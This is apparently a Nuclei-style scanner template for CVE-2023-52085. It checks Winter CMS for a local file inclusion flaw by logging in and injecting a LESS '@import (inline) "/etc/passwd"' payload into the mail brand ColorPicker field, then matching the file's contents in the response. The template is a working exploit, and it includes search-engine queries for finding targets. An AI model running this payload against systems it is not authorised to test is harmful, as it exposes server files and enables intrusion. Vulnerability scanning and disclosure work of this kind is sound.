72 lines
2.4 KiB
YAML
72 lines
2.4 KiB
YAML
id: CVE-2023-52085
|
|
|
|
info:
|
|
name: Winter CMS Local File Inclusion - (LFI)
|
|
author: sanineng
|
|
severity: medium
|
|
description: |
|
|
Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.
|
|
reference:
|
|
- https://github.com/wintercms/winter/security/advisories/GHSA-2x7r-93ww-cxrq
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-52085
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
|
|
cvss-score: 5.4
|
|
cve-id: CVE-2023-52085
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00256
|
|
epss-percentile: 0.64798
|
|
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 4
|
|
vendor: wintercms
|
|
product: winter
|
|
shodan-query: "title:\"Winter CMS\""
|
|
fofa-query: "title=\"Winter CMS\""
|
|
tags: cve,cve2023,authenticated,lfi,wintercms
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /backend/backend/auth/signin HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /backend/backend/auth/signin HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_token={{_token}}&postback=1&login={{username}}&password={{password}}
|
|
|
|
- |
|
|
POST /backend/system/mailbrandsettings HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
X-WINTER-REQUEST-HANDLER: onSave
|
|
X-WINTER-REQUEST-PARTIALS:
|
|
X-Requested-With: XMLHttpRequest
|
|
|
|
_token={{_token}}&MailBrandSetting%5Bbody_bg%5D=%2342445B;@import%20(inline)%20%22/etc/passwd%22&redirect=0
|
|
|
|
- |
|
|
GET /backend/system/mailbrandsettings HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
host-redirects: true
|
|
max-redirects: 3
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: body_4
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
name: _token
|
|
group: 1
|
|
regex:
|
|
- '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
|
|
internal: true
|
|
# digest: 4a0a00473045022044f10a2ac5ef090fdbe4307044fba2814a499e32ea22d76b1574a346ff2ca1e0022100c28977b6ba6dea5cd3cc95c633cb2e6d9f06fafaf15d1a9a7ec2f5ffc35c278f:922c64590222798bb761d5b6d8e72950 |